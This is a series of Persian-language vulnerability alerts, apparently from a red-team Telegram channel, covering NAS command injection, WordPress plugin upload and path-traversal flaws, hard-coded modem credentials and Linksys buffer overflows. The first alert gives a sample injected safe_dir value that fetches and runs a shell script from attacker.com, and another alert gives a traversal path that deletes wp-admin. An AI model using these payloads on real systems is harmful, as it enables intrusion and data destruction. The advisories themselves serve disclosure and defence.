یک آسیب‌پذیری از نوع تزریق دستور (Command Injection) در دستگاه‌های ذخیره‌سازی تحت شبکه (NAS) مدل ZSPACE Q2C تا نسخه 1.1.0210050 شناسایی شده است. این ضعف امنیتی در تابع zfilev2_api.OpenSafe واقع در مسیر /v2/file/safe/open وجود دارد که از طریق درخواست‌های HTTP POST قابل دسترسی است.

مهاجم از راه دور می‌تواند با دستکاری پارامتر safe_dir، دستورات دلخواه خود را بر روی سیستم‌عامل دستگاه هدف اجرا کند. کد بهره‌برداری (Exploit) برای این آسیب‌پذیری به صورت عمومی منتشر شده و فروشنده محصول علی‌رغم اطلاع‌رسانی، هیچ واکنشی نشان نداده است.

---

تاثیرات:
بهره‌برداری موفق از این آسیب‌پذیری به مهاجم اجازه اجرای کد از راه دور (Remote Code Execution - RCE) را با سطح دسترسی پروسه‌ی وب سرور دستگاه می‌دهد. این موضوع می‌تواند منجر به نتایج فاجعه‌باری شود، از جمله:

- کنترل کامل دستگاه و دسترسی به تمامی فایل‌های ذخیره شده.
- سرقت و استخراج اطلاعات حساس و محرمانه کاربران.
- نصب بدافزار، باج‌افزار (Ransomware) یا ایجاد درهای پشتی (Backdoor) برای دسترسی‌های آتی.
- استفاده از دستگاه آلوده به عنوان نقطه‌ای برای نفوذ و حمله به سایر دستگاه‌های موجود در شبکه داخلی.

---

سناریوی حمله:
یک مهاجم می‌تواند با دنبال کردن مراحل زیر از این آسیب‌پذیری بهره‌برداری کند:

۱. ابتدا، مهاجم با استفاده از اسکنرهای اینترنتی، دستگاه‌های ZSPACE Q2C NAS آسیب‌پذیر را که به صورت عمومی در دسترس هستند، شناسایی می‌کند.

۲. سپس، یک درخواست HTTP POST مخرب به اندپوینت /v2/file/safe/open ارسال می‌کند. در این درخواست، مقدار پارامتر safe_dir به گونه‌ای دستکاری می‌شود که شامل دستورات سیستم‌عامل باشد. برای مثال:
safe_dir=any_directory_name; wget https://attacker.com/shell.sh -O /tmp/shell.sh; chmod +x /tmp/shell.sh; /tmp/shell.sh

۳. وب سرور دستگاه بدون اعتبارسنجی کافی، این ورودی را پردازش کرده و دستورات تزریق شده توسط مهاجم را بر روی سیستم اجرا می‌کند. این عمل منجر به دانلود و اجرای یک شل مخرب بر روی دستگاه NAS می‌شود.

۴. در نهایت، مهاجم از طریق شل ایجاد شده، کنترل کامل دستگاه را در دست گرفته و می‌تواند اقدامات خرابکارانه خود را آغاز کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12673

🔴 Risk Level: CRITICAL (Score: 9.8)

🐞 شرح آسیب‌پذیری:

یک آسیب‌پذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) با شناسه CVE-2025-12673 در پلاگین Flex QR Code Generator برای وردپرس شناسایی شده است. تمام نسخه‌های این پلاگین تا نسخه 1.2.6 (شامل این نسخه) تحت تأثیر این ضعف امنیتی قرار دارند.

این آسیب‌پذیری ناشی از عدم وجود اعتبارسنجی صحیح برای نوع فایل‌ها در تابع update_qr_code() است. این نقص به مهاجمان احراز هویت نشده اجازه می‌دهد تا هر نوع فایلی (مانند یک وب‌شل مخرب) را بر روی سرور سایت آسیب‌پذیر آپلود کنند.

💥 تأثیر:

مهم‌ترین و خطرناک‌ترین پیامد این آسیب‌پذیری، امکان اجرای کد از راه دور (Remote Code Execution - RCE) است. یک مهاجم با بهره‌برداری موفق از این ضعف امنیتی می‌تواند کنترل کامل سرور را به دست آورد.

سایر تأثیرات احتمالی عبارتند از:
- سرقت اطلاعات حساس کاربران، پایگاه داده و فایل‌های پیکربندی.
- نصب بدافزار، باج‌افزار یا استفاده از سرور برای حملات DDoS.
- تغییر چهره وب‌سایت (Defacement) و آسیب به اعتبار برند.
- ایجاد دسترسی‌های پایدار (Backdoor) برای حملات آینده.

🎬 سناریو:

یک سناریوی حمله می‌تواند به شرح زیر باشد:

۱. مهاجم با ابزارهای اسکن خودکار، وب‌سایت‌های وردپرسی را که از نسخه آسیب‌پذیر پلاگین `Flex QR Code Generator` استفاده می‌کنند، شناسایی می‌کند.

۲. سپس، یک فایل مخرب مانند یک وب‌شل (Web Shell) با پسوند .php آماده می‌کند. این فایل حاوی کدهایی است که به مهاجم اجازه اجرای دستورات روی سرور را می‌دهد.

۳. مهاجم با ارسال یک درخواست دستکاری‌شده به تابع آسیب‌پذیر update_qr_code()، فایل وب‌شل خود را بدون نیاز به هیچ‌گونه نام کاربری یا رمز عبور، بر روی سرور آپلود می‌کند.

۴. پس از آپلود موفقیت‌آمیز، مهاجم آدرس مستقیم فایل آپلود شده را در مرورگر خود باز می‌کند. سرور وب، کدهای PHP موجود در فایل را اجرا کرده و در نتیجه، مهاجم به یک رابط کاربری برای اجرای دستورات دلخواه روی سرور دسترسی پیدا می‌کند و کنترل کامل آن را در اختیار می‌گیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13377

🔴 Risk Level: CRITICAL (Score: 9.6)

تحلیل آسیب‌پذیری | حذف پوشه دلخواه در افزونه 10Web Booster وردپرس
شناسه: CVE-2025-13377

📄 توضیحات آسیب‌پذیری:
آسیب‌پذیری از نوع "حذف پوشه دلخواه" (Arbitrary Folder Deletion) در افزونه محبوب وردپرس با نام 10Web Booster – Website speed optimization, Cache & Page Speed optimizer شناسایی شده است.

این ضعف امنیتی در تمام نسخه‌های 2.32.7 و پایین‌تر وجود دارد. مشکل اصلی از تابع get_cache_dir_for_page_from_url() نشأت می‌گیرد که در آن، اعتبارسنجی مسیر فایل به درستی انجام نمی‌شود.

این نقص به مهاجمان احرازهویت شده (حتی با کمترین سطح دسترسی مانند Subscriber) اجازه می‌دهد تا پوشه‌های دلخواه را روی سرور حذف کنند.

💥 تاثیرات:
بهره‌برداری موفق از این آسیب‌پذیری می‌تواند منجر به عواقب جدی برای وب‌سایت شود، از جمله:

🔻 از دست رفتن داده‌ها (Data Loss): مهاجم می‌تواند پوشه‌های حیاتی مانند wp-content/uploads که حاوی فایل‌های رسانه‌ای کاربران است را حذف کند.

🔻 از کار افتادن سرویس (Denial of Service - DoS): با حذف پوشه‌های اصلی وردپرس مانند wp-admin یا wp-includes، وب‌سایت به طور کامل از دسترس خارج شده و دچار اختلال در سرویس‌دهی می‌شود.

🔻 آسیب به یکپارچگی سایت: حذف پوشه‌های مربوط به قالب‌ها (themes) یا سایر افزونه‌ها (plugins) می‌تواند ساختار و عملکرد سایت را مختل کند.

🎭 سناریو حمله:
یک مهاجم با سطح دسترسی Subscriber (مشترک) وارد وب‌سایت هدف می‌شود. سپس با ارسال یک درخواست دستکاری‌شده به سرور که تابع آسیب‌پذیر را فراخوانی می‌کند، از تکنیک پیمایش مسیر (Path Traversal) مانند ../ استفاده می‌کند تا مسیر یک پوشه حیاتی را هدف قرار دهد.

برای مثال، مهاجم می‌تواند درخواستی ارسال کند که باعث شود سرور مسیر /wp-content/plugins/10web-booster/cache/../../../../wp-admin/ را به عنوان مسیر حذف کش در نظر بگیرد.

به دلیل عدم اعتبارسنجی صحیح، افزونه فریب خورده و به جای پوشه کش، پوشه حیاتی wp-admin را به طور کامل حذف می‌کند. در نتیجه، پنل مدیریت وردپرس از دسترس خارج شده و سایت با اختلال جدی مواجه می‌شود.

---

توصیه‌های امنیتی:

🔸 فوراً افزونه 10Web Booster را به آخرین نسخه منتشر شده به‌روزرسانی کنید.

🔸 در صورتی که به‌روزرسانی در دسترس نیست، این افزونه را تا زمان ارائه وصله امنیتی، غیرفعال و حذف نمایید.

🔸 همواره از فایل‌ها و پایگاه داده وب‌سایت خود نسخه پشتیبان تهیه کنید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12966

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری CVE-2025-12966
افزونه All-in-One Video Gallery وردپرس

📌 شرح آسیب‌پذیری:

یک آسیب‌پذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) در افزونه All-in-One Video Gallery برای وردپرس شناسایی شده است. این نقص امنیتی نسخه‌های 4.5.4 تا 4.5.7 این افزونه را تحت تأثیر قرار می‌دهد.

نقطه ضعف اصلی، عدم اعتبارسنجی صحیح نوع فایل (File Type Validation) در تابع resolve_import_directory() است. این حفره به مهاجمان احرازهویت‌شده با سطح دسترسی "نویسنده" (Author) و بالاتر اجازه می‌دهد تا فایل‌های دلخواه خود، از جمله فایل‌های اجرایی مخرب، را بر روی سرور سایت آسیب‌پذیر آپلود کنند.

💥 تأثیر:

تأثیر اصلی این آسیب‌پذیری، اجرای کد از راه دور (Remote Code Execution - RCE) است. مهاجم با آپلود یک فایل مخرب (مانند یک وب‌شل - Web Shell) می‌تواند کنترل کامل سرور میزبان وب‌سایت را در دست بگیرد.

پیامدهای این حمله می‌تواند شامل موارد زیر باشد:
- سرقت اطلاعات حساس کاربران و پایگاه داده
- تغییر ظاهر سایت (Defacement)
- استفاده از سرور برای حملات بیشتر (مانند حملات DDoS یا ارسال هرزنامه)
- نصب بدافزار و استخراج ارز دیجیتال (Cryptojacking)

🕵️‍♂️ سناریوی حمله:

۱. مهاجم ابتدا یک حساب کاربری با سطح دسترسی "نویسنده" (Author) یا بالاتر در سایت وردپرسی هدف به دست می‌آورد. (این کار می‌تواند از طریق فیشینگ، حملات Brute-force یا سوءاستفاده از یک حساب کاربری قانونی انجام شود).

۲. سپس، یک فایل مخرب مانند یک وب‌شل با پسوند .php آماده می‌کند. این فایل حاوی کدهایی برای اجرای دستورات روی سرور است.

۳. مهاجم با استفاده از قابلیت آسیب‌پذیر در افزونه، فایل shell.php خود را آپلود می‌کند. به دلیل نبود اعتبارسنجی، سیستم فایل مخرب را می‌پذیرد.

۴. پس از آپلود موفقیت‌آمیز، مهاجم آدرس مستقیم فایل آپلود شده را پیدا کرده و آن را در مرورگر خود باز می‌کند.

۵. با باز شدن آدرس، کدهای مخرب روی سرور اجرا شده و مهاجم به سرور دسترسی کامل پیدا می‌کند و می‌تواند هر دستوری را اجرا نماید.

---

💡 توصیه‌های امنیتی:

- به‌روزرسانی فوری: در اسرع وقت افزونه All-in-One Video Gallery را به آخرین نسخه امن منتشر شده آپدیت کنید.

- مدیریت دسترسی: سطح دسترسی کاربران را بازبینی کرده و از اعطای دسترسی‌های غیرضروری به کاربران نامعتبر خودداری کنید.

- استفاده از WAF: یک فایروال برنامه وب (Web Application Firewall) می‌تواند به شناسایی و مسدودسازی تلاش‌ها برای آپلود فایل‌های مخرب کمک کند.

- بررسی فایل‌ها: سرور خود را برای یافتن هرگونه فایل مشکوک و ناشناس، به‌ویژه در پوشه‌های آپلود، اسکن کنید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13065

🟠 Risk Level: HIGH (Score: 8.8)

گزارش تحلیل آسیب‌پذیری: CVE-2025-13065

📝 توضیح آسیب‌پذیری:
افزونه Starter Templates برای وردپرس در تمامی نسخه‌ها تا نسخه 4.4.41 (شامل این نسخه) دارای آسیب‌پذیری از نوع آپلود فایل دلخواه (Arbitrary File Upload) است. علت اصلی این مشکل، اعتبارسنجی ناکافی نوع فایل‌های WXR است. این نقص به مهاجم اجازه می‌دهد تا با استفاده از فایل‌هایی با پسوند دوگانه (مانند file.php.xml)، مکانیزم‌های امنیتی را دور زده و فایل مخرب خود را به عنوان یک فایل WXR معتبر آپلود کند. این آسیب‌پذیری به مهاجمان احرازهویت‌شده با سطح دسترسی نویسنده (author) و بالاتر، امکان آپلود فایل‌های دلخواه روی سرور سایت را می‌دهد که می‌تواند منجر به اجرای کد از راه دور (Remote Code Execution) شود.

💥 تأثیرات و پیامدها:
مهم‌ترین پیامد این آسیب‌پذیری، امکان اجرای کد از راه دور (RCE) است. این بدان معناست که مهاجم می‌تواند کنترل کامل وب‌سایت و سرور میزبان را به دست گیرد. سایر پیامدهای احتمالی عبارتند از: سرقت اطلاعات حساس کاربران و پایگاه داده، نصب بدافزار و درب‌های پشتی (Backdoors) برای دسترسی‌های آتی، و سوءاستفاده از سرور برای حملات دیگر مانند DDoS یا استخراج رمزارز.

👨‍💻 سناریوی حمله:
یک مهاجم با سطح دسترسی کاربری حداقل author وارد پیشخوان وردپرس می‌شود.

مهاجم یک فایل مخرب (مانند یک وب‌شل به زبان PHP) ایجاد کرده و نام آن را با پسوند دوگانه ذخیره می‌کند؛ برای مثال: shell.php.xml.

سپس با استفاده از قابلیت ایمپورت در افزونه Starter Templates، اقدام به آپلود این فایل جعلی می‌کند.

به دلیل ضعف در اعتبارسنجی، افزونه فریب خورده و فایل را به عنوان یک فایل .xml معتبر شناسایی و روی سرور آپلود می‌کند.

در نهایت، مهاجم با دسترسی مستقیم به آدرس فایل آپلود شده، کد مخرب خود را روی سرور اجرا کرده و به وب‌سایت و سرور تسلط کامل پیدا می‌کند.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14126

🟠 Risk Level: HIGH (Score: 8.8)

گزارش تحلیل آسیب‌پذیری: CVE-2025-14126

🔎 شرح آسیب‌پذیری:

یک آسیب‌پذیری با شناسه CVE-2025-14126 در مودم‌های TOZED مدل‌های ZLT M30S و ZLT M30S PRO با نسخه‌های فریمور 1.47 و 3.09.06 شناسایی شده است. این ضعف امنیتی به دلیل وجود اعتبارنامه‌های از پیش‌تعیین‌شده (Hard-coded Credentials) در یکی از توابع بخش رابط وب (Web Interface) دستگاه رخ می‌دهد. این بدان معناست که یک نام کاربری و رمز عبور ثابت و غیرقابل تغییر در نرم‌افزار مودم کدنویسی شده است. حمله برای بهره‌برداری از این آسیب‌پذیری باید از داخل شبکه محلی (LAN) انجام شود. اکسپلویت مربوط به این آسیب‌پذیری به صورت عمومی منتشر شده و شرکت سازنده به هشدارهای امنیتی پاسخی نداده است.

⚠️ تأثیر و پیامدها:

مهاجمی که به شبکه محلی (برای مثال، از طریق اتصال به Wi-Fi) دسترسی داشته باشد، می‌تواند با استفاده از این اعتبارنامه‌های افشاشده، به پنل مدیریتی مودم دسترسی کامل و در سطح ادمین پیدا کند. این سطح از دسترسی به مهاجم اجازه می‌دهد تا اقدامات مخرب زیر را انجام دهد:
- تغییر کامل تنظیمات مودم، از جمله رمز عبور Wi-Fi.
- شنود و نظارت بر کل ترافیک اینترنت کاربران متصل به شبکه.
- هدایت کاربران به وب‌سایت‌های جعلی و فیشینگ از طریق تغییر تنظیمات DNS.
- استفاده از مودم به عنوان نقطه‌ای برای اجرای حملات بیشتر علیه سایر دستگاه‌های موجود در شبکه.

🎯 سناریوی حمله:

۱. مهاجم ابتدا به شبکه Wi-Fi محلی متصل می‌شود (مثلاً با حدس زدن رمز عبور یا به عنوان یک کاربر مهمان).
۲. سپس آدرس پنل مدیریتی مودم (معمولاً 192.168.1.1) را در مرورگر خود باز می‌کند.
۳. با استفاده از نام کاربری و رمز عبور ثابتی که به صورت عمومی از طریق اکسپلویت منتشر شده است، به پنل مدیریتی وارد می‌شود.
۴. در این مرحله، مهاجم کنترل کامل بر روی مودم و ترافیک شبکه را در اختیار دارد و می‌تواند به راحتی اهداف مخرب خود را پیاده‌سازی کند.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14133

🟠 Risk Level: HIGH (Score: 8.8)

گزارش تحلیل آسیب‌پذیری: CVE-2025-14133
سرریز بافر حیاتی در توسعه‌دهنده‌های شبکه Linksys

---

شرح آسیب‌پذیری:
یک آسیب‌پذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) در تعدادی از مدل‌های توسعه‌دهنده شبکه (Range Extender) شرکت Linksys شناسایی شده است. این ضعف امنیتی در تابع AP_get_wireless_clientlist_setClientsName واقع در فایل mod_form.so وجود دارد.

مهاجم می‌تواند با ارسال یک مقدار دستکاری‌شده در پارامتر clientsname_0، این آسیب‌پذیری را از راه دور و بدون نیاز به احرازهویت فعال کند.

دستگاه‌های تحت تاثیر:
Linksys RE6500
Linksys RE6250
Linksys RE6300
Linksys RE6350
Linksys RE7000
Linksys RE9000
(در نسخه‌های فریم‌ور مشخص شده در جزئیات CVE)

تاثیر:
بهره‌برداری موفق از این آسیب‌پذیری می‌تواند منجر به دو نتیجه خطرناک شود:

۱. اجرای کد از راه دور (RCE): مهاجم می‌تواند کنترل کامل دستگاه را به دست گرفته، به ترافیک شبکه داخلی شنود کند، بدافزار نصب کند یا از دستگاه به عنوان نقطه‌ای برای حمله به سایر سیستم‌های درون شبکه استفاده نماید.

۲. ممانعت از سرویس (DoS): مهاجم می‌تواند با ارسال یک درخواست مخرب، عملکرد دستگاه را مختل کرده و آن را از دسترس خارج کند.

با توجه به اینکه کد بهره‌برداری (Exploit) این آسیب‌پذیری به صورت عمومی منتشر شده و شرکت سازنده نیز پاسخی به گزارش امنیتی نداده است، ریسک بهره‌برداری از آن بسیار بالا ارزیابی می‌شود.

سناریو:
یک مهاجم از راه دور، اینترنت را برای یافتن توسعه‌دهنده‌های Linksys آسیب‌پذیر اسکن می‌کند. پس از شناسایی یک هدف، مهاجم یک درخواست HTTP دستکاری‌شده به پنل وب دستگاه ارسال می‌کند.

این درخواست، حاوی یک رشته بسیار طولانی و مخرب در پارامتر clientsname_0 است که به تابع آسیب‌پذیر ارسال می‌شود. این داده ورودی، از فضای اختصاص‌داده‌شده در پشته فراتر رفته و آدرس بازگشت تابع را بازنویسی می‌کند.

در نتیجه، پس از اتمام کار تابع، به جای بازگشت به روال عادی برنامه، پردازنده به کدی که مهاجم در درخواست خود جاسازی کرده است (Shellcode) پرش می‌کند. این فرآیند به مهاجم اجازه می‌دهد تا با سطح دسترسی سیستم‌عامل دستگاه (احتمالاً root)، دستورات دلخواه خود را اجرا کند و کنترل کامل آن را به دست بگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14134

🟠 Risk Level: HIGH (Score: 8.8)

گزارش تحلیل آسیب‌پذیری: CVE-2025-14134

---

📝 توضیحات آسیب‌پذیری:

یک آسیب‌پذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه CVE-2025-14134 در برخی از توسعه‌دهنده‌های شبکه (Range Extender) شرکت Linksys شناسایی شده است.

این ضعف امنیتی در تابع RE2000v2Repeater_get_wireless_clientlist_setClientsName واقع در فایل mod_form.so وجود دارد. مهاجم می‌تواند با دستکاری و ارسال مقادیر مخرب به آرگومان clientsname_0، این آسیب‌پذیری را فعال‌سازی کند.

این حمله از راه دور (Remote) قابل اجرا بوده و اکسپلویت آن به صورت عمومی منتشر شده است. متأسفانه، شرکت سازنده به گزارش اولیه این آسیب‌پذیری هیچ پاسخی نداده است.

دستگاه‌های تحت تأثیر:
• Linksys RE6500, RE6250, RE6300, RE6350, RE7000, RE9000

نسخه‌های آسیب‌پذیر:
• 1.0.013.001, 1.0.04.001, 1.0.04.002, 1.1.05.003, 1.2.07.001

💥 تأثیرات:

بهره‌برداری موفق از این آسیب‌پذیری می‌تواند منجر به اجرای کد دلخواه از راه دور (Remote Code Execution - RCE) بر روی دستگاه هدف شود.

این به معنای آن است که مهاجم می‌تواند کنترل کامل دستگاه را در دست گرفته، تنظیمات آن را تغییر دهد، ترافیک شبکه را شنود کند یا از دستگاه به عنوان نقطه‌ای برای حمله به سایر دستگاه‌های موجود در شبکه داخلی استفاده نماید. همچنین، امکان از کار انداختن دستگاه (Denial of Service - DoS) نیز وجود دارد.

🎭 سناریوی حمله:

یک مهاجم از راه دور، با ارسال یک درخواست HTTP دستکاری‌شده به پنل مدیریتی دستگاه، پارامتر clientsname_0 را با داده‌ای بسیار طولانی‌تر از ظرفیت بافر مربوطه مقداردهی می‌کند.

این عمل باعث سرریز شدن بافر در پشته حافظه (Stack) شده و به مهاجم اجازه می‌دهد تا آدرس بازگشت تابع را بازنویسی کرده و کنترل اجرای برنامه را به کد مخرب تزریق‌شده توسط خود منتقل کند. در نتیجه، مهاجم می‌تواند دستورات دلخواه خود را با سطح دسترسی دستگاه آسیب‌پذیر اجرا نماید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14135

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری | CVE-2025-14135

شرح آسیب‌پذیری:
یک آسیب‌پذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه CVE-2025-14135 در برخی از دستگاه‌های توسعه‌دهنده محدوده (Range Extender) شرکت Linksys شناسایی شده است.

این ضعف امنیتی در تابع AP_get_wired_clientlist_setClientsName در فایل mod_form.so وجود دارد. مهاجم از راه دور می‌تواند با ارسال یک مقدار دستکاری‌شده و طولانی برای پارامتر clientsname_0، باعث سرریز بافر شده و کنترل اجرای برنامه را به دست گیرد.

دستگاه‌های تحت تاثیر:
• Linksys RE6500, RE6250, RE6300, RE6350, RE7000, RE9000

نسخه‌های فریم‌ور آسیب‌پذیر:
• 1.0.013.001 / 1.0.04.001 / 1.0.04.002 / 1.1.05.003 / 1.2.07.001

تاثیرات:
بهره‌برداری موفق از این آسیب‌پذیری می‌تواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) با بالاترین سطح دسترسی روی دستگاه شود.

این به این معناست که مهاجم می‌تواند:
• کنترل کامل دستگاه را به دست بگیرد.
• تمام ترافیک شبکه را شنود و دستکاری کند.
• از دستگاه به عنوان نقطه‌ای برای حمله به سایر دستگاه‌های موجود در شبکه داخلی استفاده کند.
• بدافزار یا درهای پشتی (Backdoor) روی دستگاه نصب کند.
• با ایجاد اختلال در عملکرد دستگاه، سرویس‌دهی شبکه را مختل کند (Denial of Service).

با توجه به در دسترس بودن اکسپلویت عمومی و عدم پاسخگویی شرکت سازنده، ریسک این آسیب‌پذیری بسیار بالا ارزیابی می‌شود.

سناریوی حمله:
یک مهاجم که به شبکه محلی دسترسی دارد (یا در صورتی که پنل مدیریت دستگاه روی اینترنت در دسترس باشد، از راه دور)، یک درخواست HTTP دستکاری‌شده به سمت رابط وب دستگاه ارسال می‌کند.

این درخواست شامل یک مقدار بسیار طولانی برای پارامتر clientsname_0 است که مربوط به قابلیت "تغییر نام کلاینت‌های متصل با سیم" می‌باشد.

این مقدار طولانی، فضای اختصاص‌داده‌شده در پشته (Stack) را پر کرده و داده‌های حیاتی مجاور، مانند آدرس بازگشت (Return Address)، را بازنویسی می‌کند.

در نهایت، این بازنویسی باعث می‌شود که کد مخرب مهاجم (Shellcode) که در درخواست جاسازی شده است، با سطح دسترسی سیستم‌عامل دستگاه اجرا شود و کنترل کامل دستگاه در اختیار مهاجم قرار گیرد.

---

توصیه‌های امنیتی:
با توجه به اینکه شرکت Linksys هیچ وصله امنیتی برای این آسیب‌پذیری منتشر نکرده است، اقدامات زیر جهت کاهش ریسک ضروری است:

محدود کردن دسترسی به پنل مدیریت دستگاه فقط از طریق شبکه داخلی و اطمینان از عدم در دسترس بودن آن بر روی اینترنت.
استفاده از کلمه عبور قوی و منحصربه‌فرد برای پنل مدیریت.
در صورت امکان، جایگزینی دستگاه با مدلی که پشتیبانی امنیتی فعال دارد.
نظارت مستمر بر ترافیک شبکه برای شناسایی هرگونه فعالیت مشکوک.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal